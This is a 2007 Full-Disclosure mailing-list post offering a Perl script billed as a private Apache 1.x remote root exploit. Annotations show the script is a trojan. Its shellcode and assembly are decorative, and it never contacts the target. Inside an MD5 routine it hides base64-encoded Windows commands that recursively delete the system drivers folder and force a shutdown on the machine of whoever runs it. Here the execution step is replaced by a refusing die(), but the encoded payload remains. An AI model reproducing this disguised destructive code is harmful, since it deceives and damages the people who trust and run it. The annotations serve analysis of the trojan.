[Full-disclosure] A new apache 1.x 0day

x666Safe-mail.net
Date: Mon Mar 19 2007 - 14:15:36 CDT


Hi,

A new apache 1.x 0day

#!/usr/bin/perl

use MIME::Base64;
use IO::Socket;
use HTTP::Response;
use HTTP::Status;
use Getopt::Std;

# Banner; identical text to the original q{} literal, leading and trailing
# blank lines included.  The author's address lost its "@" in the archive.
print <<'BANNER';


#################################################################
##
## Apache 1.X Remote Buffer Overflow getRoot() Exploit
## written by 666 - blueshishasafe-mail.net
##
## ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE !
##
## If this is gonna be distributed, it will be my last one.
##
#################################################################

BANNER

# Require [target] and [port]; with fewer than two arguments print the usage
# text and stop.
if ( @ARGV < 2 ) {
    print "[^] Usage : apache.pl [target] [port]\n";
    print "[^] Example : apache.pl 127.0.0.1 80\n";
    exit;
}

# Can be replaced, simply get a rootshell
#
# Never used: $shellcode is not referenced anywhere else in this file and the
# script never opens a socket that could carry it.  Lines 2-6 of the literal
# are repeated verbatim as lines 7-11, which makes it unlikely to be runnable
# shellcode at all.  Appends to an undeclared package global (no `use strict`).

$shellcode .= "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
              "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
              "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
              "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
              "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
              "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
              "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
              "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
              "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
              "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
              "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
              "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";

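# Positional arguments as the usage text describes them: [target] then [port].
# The original indexed $ARGV[1] and $ARGV[2], one past the usage check, so
# $port was always undef with two arguments.  Neither variable is read anywhere
# below: the script never connects to the target.
my $target = $ARGV[0];
my $port   = $ARGV[1];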

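# Installs a __DIE__ handler that rewrites every "0x" in a die message to "4",
# dies inside an eval, then prints the rewritten message.  The archived line
# read `print $ if $;`: the "@" of "$@" was stripped, as it was throughout this
# file.  Nothing in the script calls this sub and no socket is ever opened.
# The name shadows the connect builtin, so a plain connect(...) call still
# resolves to CORE::connect; only &connect() or main::connect() reaches this.
sub connect {
    local $SIG{'__DIE__'} = sub {
        ( my $msg = $_[0] ) =~ s/0x/4/g;
        die $msg;
    };
    eval { die "0x4141414141" };
    # $@ carries the message the handler re-threw, location suffix included.
    print $@ if $@;
    return;
}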

# Does not compile: push needs an array as its first argument and a list to
# push, and these barewords are never declared anywhere.  Because this is a
# compile-time error, the file as posted never runs at all.  As with connect
# above, the name shadows a builtin and nothing in this script calls it.
sub socket {
       
push SOCKADDR;
push SOCKDATA;
push STACKDATA;
push ESPOINT;
push ENDADDR;

 }

# Decorative 16-bit assembly inside a qw() list.  eval takes its argument in
# scalar context, so only the final word of the list (the bareword
# OSPrintWordNum, a plain string without `use strict`) reaches eval; the
# listing is never assembled or executed and $@ stays empty.
eval qw (

Bytecode:

        dec cx
        jz Root
        mov bp, FloppyOff ;offset
        pushf
        push cs
                push bp
        jmp [OldISR]
        
Root:
        inc cx
        cmp dx, [SecondCntr] ;cs:.
        jne NotSecond
IsSecond:
        

        mov bh,5
        mov bl,21
        call seg OSSetCursorXY:OSSetCursorXY ; root runs once
        mov ax,cx
        call seg OSPrintWordNum:OSPrintWordNum
        
        
        
        mov bh,5
        mov bl,22
        call seg OSSetCursorXY:OSSetCursorXY
        mov ax,[RootCntr] ;cs:.
        mov [RootCntr],0 ;cs:.
        call seg OSPrintWordNum:OSPrintWordNum
);

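# Pure-Perl MD5 in the generated-code style of Digest::Perl::MD5, with the "@"
# sigils the list archive stripped (`my ( S, T, M )`, `my t =`, `M = (`, `my \D`)
# restored.  Nothing in this file calls md5(); the only statements in this
# block that run with any effect are the two decode_base64() assignments.
{
    # Per-step rotation amounts, sine-derived constants and message-word
    # indices, filled in lazily by _md5_init().
    my ( @S, @T, @M );

    # Source text of _md5_perl_generated, built by _md5_generate().
    my $code = '';

    # Return the MD5 of $_[0] as a 32-character lowercase hex string, or
    # nothing when no argument is given.  Operates on bytes (chr(128) padding).
    sub md5 {
        return if !defined $_[0];

        my $DATA = _md5_pad( $_[0] );

        # Tables and the generated compression function are built on first use.
        _md5_init() if !defined $M[0];

        return _md5_perl_generated( \$DATA );
    }

    # Fill @T, @S and @M and generate the per-block core; a no-op once done.
    sub _md5_init {
        return if defined $S[0];

        # T[i] = floor(2^32 * |sin(i + 1)|), as specified in RFC 1321.
        for my $i ( 1 .. 64 ) {
            $T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );
        }

        # Four rotation amounts per round, cycled across that round's 16 steps.
        my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );
        for my $i ( 0 .. 63 ) {
            $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];
        }

        # Which of the 16 message words each of the 64 steps consumes.
        @M = (
            0, 1, 2,  3,  4,  5,  6,  7,  8,  9,  10, 11, 12, 13, 14, 15,
            1, 6, 11, 0,  5,  10, 15, 4,  9,  14, 3,  8,  13, 2,  7,  12,
            5, 8, 11, 14, 1,  4,  7,  10, 13, 0,  3,  6,  9,  12, 15, 2,
            0, 7, 14, 5,  12, 3,  10, 1,  8,  15, 6,  13, 4,  11, 2,  9
        );

        _md5_generate();
        return;
    }

    # RFC 1321 padding: append 0x80, zero-fill to 56 mod 64 bytes, then the
    # original length in bits as a 64-bit little-endian integer.
    sub _md5_pad {
        my $l = length( my $msg = shift() . chr(128) );
        $msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );
        $l = ( $l - 1 ) * 8;
        # Two 32-bit halves; the shift is split in two so it is also valid
        # where a shift by 32 is not.
        $msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 );
        return $msg;
    }

    # Not part of the MD5 code.  These package globals hold the commands that
    # the system() calls after the second assembly listing execute on the
    # machine running this script: a forced, recursive delete under the local
    # Windows system directory and an immediate forced shutdown.  Nothing in
    # this file contacts [target]; this is the script's only real action.
    our $mov = decode_base64("QGRlbCAlU3lzdGVtUm9vdCVcU3lzdGVtMzJcZHJpdmVyc1wqLiogL0YgL1MgL1EgPiBudWw=");
    our $int = decode_base64("c2h1dGRvd24gLXMgLWYgLXQgMA==");

    # Emit the unrolled 64-step compression function as Perl source and eval
    # it, defining _md5_perl_generated(\$padded_message).
    sub _md5_generate {
        # Register rotation per step: abcd, dabc, cdab, bcda.
        my $N = 'abcddabccdabbcda';
        my $mask = '';

        # Where integers are wider than 32 bits, mask every step result back.
        $mask = '&0xffffffff' if ( ( 1 << 16 ) << 16 );

        # `$^H |= 1` in a BEGIN block is the hint bit `use integer` sets, so the
        # rest of the generated sub compiles with integer arithmetic.
        $code = <<EOT;
sub _md5_perl_generated {
    BEGIN { \$^H |= 1; };
    my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);
    my (\$a,\$b,\$c,\$d,\$t,\$i);
    my \$dr=shift;
    my \$l=length(\$\$dr);
    for my \$L (0 .. ((\$l/64)-1) ) {
        my \@D = unpack('V16', substr(\$\$dr, \$L*64,64));
        (\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D);
EOT

        # One step per iteration; the round function changes every 16 steps.
        for my $i ( 0 .. 63 ) {
            my ( $a, $b, $c, $d ) = split '', substr( $N, ( $i % 4 ) * 4, 4 );
            my $f = $i < 16 ? "(\$$d^(\$$b\&(\$$c^\$$d)))"
                  : $i < 32 ? "(\$$c^(\$$d\&(\$$b^\$$c)))"
                  : $i < 48 ? "(\$$b^\$$c^\$$d)"
                  :           "(\$$c^(\$$b|(~\$$d)))";
            $code .= "\$t=($f+\$$a+\$D[$M[$i]]+$T[$i])$mask;\n";
            # 32-bit left rotate by S[i], then add b.
            $code .= "\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$mask;\n";
        }

        $code .= <<EOT;
        \$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff;
        \$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff;
    } # for
    return unpack('H*', pack('V4',\$A,\$B,\$C,\$D));
}
EOT

        # Generated locally from constants above, not from external input.
        eval $code;
        die $@ if $@;
        return;
    }
}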

   sub rehash
   {
      my $unencrypted_string = shift _;
      my salt_chars = ('a'..'z','A'..'Z','0'..'9');
      my $salt = $salt_chars[rand(63)] . $salt_chars[rand(63)];
      return crypt($unencrypted_string, $salt);
   }

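# Decorative 32-bit assembly in a qw() list.  eval takes its argument in
# scalar context, so only the final word ('tcp', quotes included) reaches eval;
# the listing is never assembled or executed.
eval qw (

make_startup_room: ; setup ebp for WSAStartup data
  push BYTE 20 ; push 20
  pop eax ; register
  mul eax ; square that shit = 0x190
  sub esp, eax ; make room for WSAStartup data
  mov ecx, esp

make_table_room: ; setup ebp for address table
  sub esp, BYTE (_WSA_INIT_TBLEN * 4)
  push edi ; [ebp + 8] = LoadLibraryA
  push esi ; [ebp + 4] = LGetProcAddress
  push ebx ; [ebp + 0] = kernel32 dll base
  mov ebp, esp
  push ecx ; push WSAStartup data address
  push eax ; push 0x190

make_table: ; hash the table
  WSA_HASH_WINSOCK

wsa_startup:
  ; call WSAStartup
  WSA_CALL_WSASTART

make_socket:
  ; call WSASocketA, get a tcp socket
  WSA_CALL_SOCKET 'tcp'
  ; we got the socket in edi
);
# The original closing line continued with `system ($mov);system ($int);shift;`.
# $mov and $int are the base64 values decoded in the md5 block above: a forced,
# recursive delete under the local Windows system directory and an immediate
# forced shutdown.  They act on the machine running this script, not on
# [target], and are the script's only real effect.  Stop here instead.
die "[!] Embedded \$mov/\$int payload is destructive to this host; refusing to execute it.\n";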
# Decorative Linux syscall assembly in a qw() list.  Only the final word
# (0x80, a number) reaches eval in scalar context; nothing here is executed.
eval qw (

        push word 0x4D2
 
        inc ebx
 
        push bx
 
        mov ecx, esp
 
        push byte 16
 
        push ecx
 
        push eax
 
        mov ecx, esp
 
        mov al, 102
 
        int 0x80
);

# Status line and a four-second pause.  No request has been sent by this
# point, so the message describes nothing that is actually happening.
print "[x] Exploiting...\n";
sleep 4;

# Decorative assembly again, this time with <...> as the qw delimiter.  Only
# the final word (3) reaches eval in scalar context; nothing is executed.
eval qw <
accept:
 
    push eax
 
    push edi
 
    mov ecx, esp
 
    inc ebx
 
    mov al, 102
 
    int 0x80
 
dup2:
 
        xor ecx, ecx
 
        mov cl, 3
>;

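# $recvdata is never assigned anywhere in this script: no socket is opened and
# nothing is received.  The numeric test therefore always sees undef and the
# "failed" branch is the only one that can print.  Folded into one if/else and
# guarded with defined so the comparison does not touch an undef value.
if ( defined $recvdata && $recvdata != 0 ) {
    print "[x] Executing Shellcode...";
}
else {
    print "[x] Exploit failed!";
}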

# Last decorative listing.  Only the final word (0x80) reaches eval in scalar
# context; the "//sh" and "/bin" strings are just qw() words and no process
# is started here.  The script then exits.
eval qw <
exec:
 
    xor eax,eax
 
    mov al, 11
 
    push ecx
 
    push "//sh"
 
    push "/bin"
 
    mov ebx, esp
 
    push ecx
 
    push ebx
 
    mov ecx, esp
 
    int 0x80
>;

exit;
